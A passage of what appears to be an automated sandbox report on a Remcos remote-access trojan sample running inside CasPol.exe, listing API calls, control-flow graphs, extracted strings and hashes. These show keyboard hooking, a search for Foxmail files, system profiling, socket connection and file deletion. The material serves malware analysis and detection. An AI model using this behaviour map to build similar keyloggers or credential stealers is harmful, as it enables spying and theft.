                                                                                                                                                                          control_flow_graph 1693 40a2f3-40a30a 1694 40a30c-40a326 GetModuleHandleA SetWindowsHookExA 1693->1694 1695 40a36e-40a37e GetMessageA 1693->1695 1694->1695 1698 40a328-40a36c GetLastError call 41bc1f call 4052fd call 402093 call 41b580 call 401fd8 1694->1698 1696 40a380-40a398 TranslateMessage DispatchMessageA 1695->1696 1697 40a39a 1695->1697 1696->1695 1696->1697 1699 40a39c-40a3a1 1697->1699 1698->1699
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                                                                                                                                                          • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040A328
                                                                                                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                          • GetMessageA.USER32 ref: 0040A376
                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 0040A385
                                                                                                                                                                          • DispatchMessageA.USER32(?), ref: 0040A390
                                                                                                                                                                          Strings
                                                                                                                                                                          • Keylogger initialization failure: error , xrefs: 0040A33C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                                                                                          • String ID: Keylogger initialization failure: error
                                                                                                                                                                          • API String ID: 3219506041-952744263
                                                                                                                                                                          • Opcode ID: 7cde40bb29b11998e41da7f6fd46d44b8e76a4fe11235a41ece9cee6dc4e42f4
                                                                                                                                                                          • Instruction ID: bc7b44719e59224dfa2ccda8cade24f8ec1ba8a069f7aee67aec650331f950b6
                                                                                                                                                                          • Opcode Fuzzy Hash: 7cde40bb29b11998e41da7f6fd46d44b8e76a4fe11235a41ece9cee6dc4e42f4
                                                                                                                                                                          • Instruction Fuzzy Hash: 8911C131510301EBC710BB769C0986B77ACEB95715B20097EFC82E22D1FB34C910CBAA
APIs
• lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
• lstrcatW.KERNEL32(?,?), ref: 10001151
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
• FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
• FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
• FindClose.KERNEL32(00000000), ref: 100011DB
Memory Dump Source
• Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
Similarity
• API ID: lstrlen$Find$File$CloseFirstNextlstrcat
• String ID:
• API String ID: 1083526818-0
• Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
• Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
• Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
• Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6
APIs
  • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
  • Part of subcall function 00413584: RegQueryValueExA.KERNEL32 ref: 004135C2
  • Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
• Sleep.KERNEL32(00000BB8), ref: 0040F896
• ExitProcess.KERNEL32 ref: 0040F905
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Similarity
• API ID: CloseExitOpenProcessQuerySleepValue
• String ID: 5.2.0 Pro$override$pth_unenc$xtv
• API String ID: 2281282204-3247355391
• Opcode ID: dd022d37faf85c83f6d16c9c954fb50513bd165f4129af8d01f50529c9010c87
• Instruction ID: 0454f1d730b8de97e77b6af0221289a353f5645d6d0bcfbcd4472c6607f37e61
• Opcode Fuzzy Hash: dd022d37faf85c83f6d16c9c954fb50513bd165f4129af8d01f50529c9010c87
• Instruction Fuzzy Hash: 7421E171B0420127D6087676885B6AE399A9B80708F50453FF409672D6FF7C8E0483AF
APIs
  • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
• SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
• GetNativeSystemInfo.KERNEL32(?), ref: 00411DE0
• SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
  • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
• GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
• HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
• SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
  • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
  • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000), ref: 00412129
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Similarity
• API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
• String ID:
• API String ID: 3950776272-0
• Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
• Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
• Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
• Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
APIs
• GetComputerNameExW.KERNEL32(00000001,?,0000002B,h}v), ref: 0041B6BB
• GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Similarity
• API ID: Name$ComputerUser
• String ID: h}v
• API String ID: 4229901323-2591199288
• Opcode ID: a649893464b8dc9f92fcf892b6f773fc4b962ecf36c796a43829c604b32fbd1e
• Instruction ID: 96a0ba9ffe47efa01ac310f3847ceb2d7b3b0148e4494d8e74ae155582b6cc75
• Opcode Fuzzy Hash: a649893464b8dc9f92fcf892b6f773fc4b962ecf36c796a43829c604b32fbd1e
• Instruction Fuzzy Hash: 9E014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E888BA8
APIs
• CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,0076F4A0), ref: 004338DA
• CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
• CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Similarity
• API ID: Crypt$Context$AcquireRandomRelease
• String ID:
• API String ID: 1815803762-0
• Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
• Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
• Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
• Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
APIs
• GetSystemTimeAsFileTime.KERNEL32(00000000,0043AB37), ref: 00448A16
Strings
• GetSystemTimePreciseAsFileTime, xrefs: 004489F2
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Similarity
• API ID: Time$FileSystem
• String ID: GetSystemTimePreciseAsFileTime
• API String ID: 2086374402-595813830
• Opcode ID: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
• Instruction ID: bacba389ed7ed90706db716b221aab5ed2509560655679cc0f09f15d90276a03
• Opcode Fuzzy Hash: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
• Instruction Fuzzy Hash: 79E0E531A81618FBD7116B25EC02E7EBB50DB08B02B10027FFC05A7292EE754D14D6DE
APIs
• SetUnhandledExceptionFilter.KERNEL32 ref: 00434BDD
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
• Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
• Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
• Instruction Fuzzy Hash:

Control-flow Graph
APIs
  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
• GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 0040EA29
  • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
• String ID: (TG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-N6HMP4$Software\$User$`SG$del$del$exepath$h]v$hev$h}v$licence$license_code.txt$tMG$xtv
• API String ID: 2830904901-214815415
• Opcode ID: 07b2b0c7241cf00acb74f7775d1551c562902b351f0098e9289c0005d90a0865
• Instruction ID: 744eeac4272eceb7f63ef51a6efbfa797c3f505d1bd04c543663c5f487e0f2b9
• Opcode Fuzzy Hash: 07b2b0c7241cf00acb74f7775d1551c562902b351f0098e9289c0005d90a0865
• Instruction Fuzzy Hash: 7D32D860B043416BDA14B7729C57B6E26994F80748F40483FB9467F2E3EEBD8D45839E

Control-flow Graph
APIs
• Sleep.KERNEL32(00000000,00000029,00475300,h}v,00000000), ref: 00414FB6
• WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
• Sleep.KERNEL32(00000000,00000002), ref: 00415B12
  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Sleep$ErrorLastLocalTime
• String ID: | $%I64u$5.2.0 Pro$@ev$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Rmc-N6HMP4$TLS Off$TLS On $`SG$h]v$hlight$h}v$name$tMG$xtv
• API String ID: 524882891-3837567690
• Opcode ID: 7bf696abd08d2381de43c76793c389733c40d927b3f9d1472677c8aefb4019fd
• Instruction ID: d8c825886b0a0d8326cbfb5c9d4cc5050fd80dde9ad4bcb2ea62c87b00a1b781
• Opcode Fuzzy Hash: 7bf696abd08d2381de43c76793c389733c40d927b3f9d1472677c8aefb4019fd
• Instruction Fuzzy Hash: 03526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                                                                                                                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                                                            • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                                                                                                                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                                                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                                                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                                                            • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                                                            • Part of subcall function 100010F1: FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                                                                                                                                            • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                          • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                          • API String ID: 672098462-2938083778
                                                                                                                                                                          • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                                                          • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                                                                                                                          • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                                                          • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          control_flow_graph 1009 414dc1-414dfd 1010 414e03-414e18 GetSystemDirectoryA 1009->1010 1011 414f18-414f23 1009->1011 1012 414f0e 1010->1012 1013 414e1e-414e6a call 441a8e call 441ae8 LoadLibraryA 1010->1013 1012->1011 1018 414e81-414ebb call 441a8e call 441ae8 LoadLibraryA 1013->1018 1019 414e6c-414e76 GetProcAddress 1013->1019 1032 414f0a-414f0d 1018->1032 1033 414ebd-414ec7 GetProcAddress 1018->1033 1020 414e78-414e7b FreeLibrary 1019->1020 1021 414e7d-414e7f 1019->1021 1020->1021 1021->1018 1023 414ed2 1021->1023 1025 414ed4-414ee5 GetProcAddress 1023->1025 1027 414ee7-414eeb 1025->1027 1028 414eef-414ef2 FreeLibrary 1025->1028 1027->1025 1030 414eed 1027->1030 1031 414ef4-414ef6 1028->1031 1030->1031 1031->1032 1034 414ef8-414f08 1031->1034 1032->1012 1035 414ec9-414ecc FreeLibrary 1033->1035 1036 414ece-414ed0 1033->1036 1034->1032 1034->1034 1035->1036 1036->1023 1036->1032
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                                                                                                                                          • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                                                                                                                                          • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                                                                                          • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                                                                                          • API String ID: 2490988753-744132762
                                                                                                                                                                          • Opcode ID: 93ac1047b93552b97dd98974212ca4d4f14522e3aac142c7c555de1a9c5e5d12
                                                                                                                                                                          • Instruction ID: 3afff981d8ce70f6205f85204df1f21ec1f12b20cff6a054e3a0857f0929e507
                                                                                                                                                                          • Opcode Fuzzy Hash: 93ac1047b93552b97dd98974212ca4d4f14522e3aac142c7c555de1a9c5e5d12
                                                                                                                                                                          • Instruction Fuzzy Hash: 3231C2B2906315ABD7209F65CC84EDF76DCAB84754F004A2AF984A3211D738D985CBAE

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          control_flow_graph 1037 412aef-412b38 GetModuleFileNameW call 4020df * 3 1044 412b3a-412bc4 call 41ba09 call 401fab call 40da23 call 401fd8 call 41ba09 call 401fab call 40da23 call 401fd8 call 41ba09 call 401fab call 40da23 call 401fd8 1037->1044 1069 412bc6-412c56 call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1044->1069 1092 412c66 1069->1092 1093 412c58-412c60 Sleep 1069->1093 1094 412c68-412cf8 call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1092->1094 1093->1069 1093->1092 1117 412d08 1094->1117 1118 412cfa-412d02 Sleep 1094->1118 1119 412d0a-412d9a call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1117->1119 1118->1094 1118->1117 1142 412daa-412dcf 1119->1142 1143 412d9c-412da4 Sleep 1119->1143 1144 412dd3-412def call 401f04 call 41c516 1142->1144 1143->1119 1143->1142 1149 412df1-412e00 call 401f04 DeleteFileW 1144->1149 1150 412e06-412e22 call 401f04 call 41c516 1144->1150 1149->1150 1157 412e24-412e3d call 401f04 DeleteFileW 1150->1157 1158 412e3f 1150->1158 1159 412e43-412e5f call 401f04 call 41c516 1157->1159 1158->1159 1166 412e61-412e73 call 401f04 DeleteFileW 1159->1166 1167 412e79-412e7b 1159->1167 1166->1167 1169 412e88-412e93 Sleep 1167->1169 1170 412e7d-412e7f 1167->1170 1169->1144 1173 412e99-412eab call 406b63 1169->1173 1170->1169 1172 412e81-412e86 1170->1172 1172->1169 1172->1173 1176 412f01-412f20 call 401f09 * 3 1173->1176 1177 412ead-412ebb call 406b63 1173->1177 1188 412f25-412f5e call 40b93f call 401f04 call 4020f6 call 413268 1176->1188 1177->1176 1183 412ebd-412ecb call 406b63 1177->1183 1183->1176 1189 412ecd-412ef9 Sleep call 401f09 * 3 1183->1189 1204 412f63-412f89 call 401f09 call 405b05 1188->1204 1189->1044 1203 412eff 1189->1203 1203->1188 1209 4130e3-4131dc call 41bdaf call 402f31 call 402f10 * 6 call 402ea1 call 404aa1 call 401fd8 * 7 1204->1209 1210 412f8f-4130de call 41bdaf call 41bc1f call 402f31 call 402f10 * 6 call 402ea1 call 402f10 call 402ea1 call 404aa1 call 401fd8 * 10 1204->1210 1279 4131e0-413267 call 401fd8 call 401f09 call 401fd8 * 9 1209->1279 1210->1279
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                                                                                                                                            • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,7570D4DF,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,00475300), ref: 0041BA30
                                                                                                                                                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                                                                                                                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                                                                                                                                          • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                                                                                                                                                          • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                                                                                                                                                          • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                                                                                                                                                          • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
